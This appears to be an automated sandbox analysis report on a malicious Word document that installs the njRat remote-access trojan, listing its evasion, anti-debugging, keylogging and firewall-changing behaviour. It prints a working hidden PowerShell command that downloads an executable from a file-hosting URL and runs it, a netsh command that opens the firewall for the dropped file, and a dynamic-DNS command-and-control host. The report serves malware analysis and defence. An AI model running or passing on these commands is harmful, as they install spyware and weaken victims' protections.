Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\System32\mshta.exeWindow / User API: threadDelayed 764Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeWindow / User API: threadDelayed 4463Jump to behavior
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\dllhost.exe TID: 924Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\verclsid.exe TID: 1076Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\verclsid.exe TID: 1076Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\mshta.exe TID: 1904Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\mshta.exe TID: 372Thread sleep count: 764 > 30Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 372Thread sleep time: -45840000s >= -30000sJump to behavior
Source: C:\Windows\System32\mshta.exe TID: 372Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\mshta.exe TID: 1912Thread sleep time: -420000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2360Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe TID: 2800Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe TID: 2144Thread sleep count: 4463 > 30Jump to behavior
Source: C:\Windows\System32\netsh.exe TID: 4056Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe TID: 3248Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe TID: 3548Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe TID: 3396Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe TID: 1956Thread sleep time: -60000s >= -30000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeLast function: Thread delayed
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\dllhost.exeSystem information queried: KernelDebuggerInformationJump to behavior
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess token adjusted: DebugJump to behavior
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Users\user\AppData\Local\Temp\exploit.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
.NET source code references suspicious native API functionsShow sources
Source: exploit.exe.9.dr, OK.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: exploit.exe.9.dr, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: dllhost.exe.10.dr, OK.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: dllhost.exe.10.dr, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 10.2.exploit.exe.1d0000.0.unpack, OK.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 10.2.exploit.exe.1d0000.0.unpack, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 10.0.exploit.exe.1d0000.0.unpack, OK.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 10.0.exploit.exe.1d0000.0.unpack, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: bde52a20d668d6f304b9db902c7cfc6b.exe.11.dr, OK.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: bde52a20d668d6f304b9db902c7cfc6b.exe.11.dr, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 11.0.dllhost.exe.210000.0.unpack, OK.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 11.0.dllhost.exe.210000.0.unpack, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 11.2.dllhost.exe.210000.0.unpack, OK.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 11.2.dllhost.exe.210000.0.unpack, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 15.0.dllhost.exe.210000.0.unpack, OK.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 15.0.dllhost.exe.210000.0.unpack, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 15.2.dllhost.exe.210000.0.unpack, OK.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 15.2.dllhost.exe.210000.0.unpack, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 16.0.dllhost.exe.210000.0.unpack, OK.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 16.0.dllhost.exe.210000.0.unpack, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 16.2.dllhost.exe.210000.0.unpack, OK.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 16.2.dllhost.exe.210000.0.unpack, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','C:\Users\user\AppData\Local\Temp\exploit.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\exploit.exe'Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\verclsid.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Modifies the windows firewallShow sources
Source: unknownProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\dllhost.exe' 'dllhost.exe' ENABLE
Uses netsh to modify the Windows network and firewall settingsShow sources
Source: unknownProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\dllhost.exe' 'dllhost.exe' ENABLE

Remote Access Functionality:

barindex
Detected njRatShow sources
Source: exploit.exe.9.dr, OK.cs.Net Code: njRat config detected
Source: dllhost.exe.10.dr, OK.cs.Net Code: njRat config detected
Source: 10.2.exploit.exe.1d0000.0.unpack, OK.cs.Net Code: njRat config detected
Source: 10.0.exploit.exe.1d0000.0.unpack, OK.cs.Net Code: njRat config detected
Source: bde52a20d668d6f304b9db902c7cfc6b.exe.11.dr, OK.cs.Net Code: njRat config detected
Source: 11.0.dllhost.exe.210000.0.unpack, OK.cs.Net Code: njRat config detected
Source: 11.2.dllhost.exe.210000.0.unpack, OK.cs.Net Code: njRat config detected
Source: 15.0.dllhost.exe.210000.0.unpack, OK.cs.Net Code: njRat config detected
Source: 15.2.dllhost.exe.210000.0.unpack, OK.cs.Net Code: njRat config detected
Source: 16.0.dllhost.exe.210000.0.unpack, OK.cs.Net Code: njRat config detected
Source: 16.2.dllhost.exe.210000.0.unpack, OK.cs.Net Code: njRat config detected

Signature Similarity

Sample Distance (10 = nearest)
10 9 8 7 6 5 4 3 2 1
Samplename Analysis ID SHA256 Similarity

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 967598 Sample: AutoformLiscence bls activa... Startdate: 30/09/2019 Architecture: WINDOWS Score: 100 47 amibas8722.ddns.net 2->47 59 Malicious sample detected (through community Yara rule) 2->59 61 Antivirus or Machine Learning detection for dropped file 2->61 63 Multi AV Scanner detection for submitted file 2->63 65 9 other signatures 2->65 10 cmd.exe 2->10         started        13 WINWORD.EXE 301 38 2->13         started        15 mshta.exe 2->15         started        17 4 other processes 2->17 signatures3 process4 signatures5 71 Suspicious powershell command line found 10->71 73 Tries to download and execute files (via powershell) 10->73 19 powershell.exe 12 8 10->19         started        75 Document exploit detected (process start blacklist hit) 13->75 24 mshta.exe 9 13->24         started        26 verclsid.exe 13->26         started        77 Creates processes via WMI 15->77 process6 dnsIp7 49 a.top4top.net 163.172.46.38, 443, 49163 unknown United Kingdom 19->49 51 1.top4top.net 19->51 41 C:\Users\user\AppData\Local\...\exploit.exe, PE32 19->41 dropped 67 Powershell drops PE file 19->67 28 exploit.exe 1 5 19->28         started        file8 69 Uses dynamic DNS services 49->69 signatures9 process10 file11 43 C:\Users\user\AppData\Local\...\dllhost.exe, PE32 28->43 dropped 79 Antivirus or Machine Learning detection for dropped file 28->79 32 dllhost.exe 4 3 28->32         started        signatures12 process13 dnsIp14 45 amibas8722.ddns.net 32->45 39 C:\...\bde52a20d668d6f304b9db902c7cfc6b.exe, PE32 32->39 dropped 53 Antivirus or Machine Learning detection for dropped file 32->53 55 Creates autostart registry keys with suspicious names 32->55 57 Drops PE files to the startup folder 32->57 37 netsh.exe 32->37         started        file15 signatures16 process17

Simulations

Behavior and APIs

TimeTypeDescription
19:55:29API Interceptor547x Sleep call for process: dllhost.exe modified
19:55:53API Interceptor6x Sleep call for process: verclsid.exe modified
19:55:53API Interceptor1499x Sleep call for process: mshta.exe modified
19:56:01API Interceptor37x Sleep call for process: powershell.exe modified
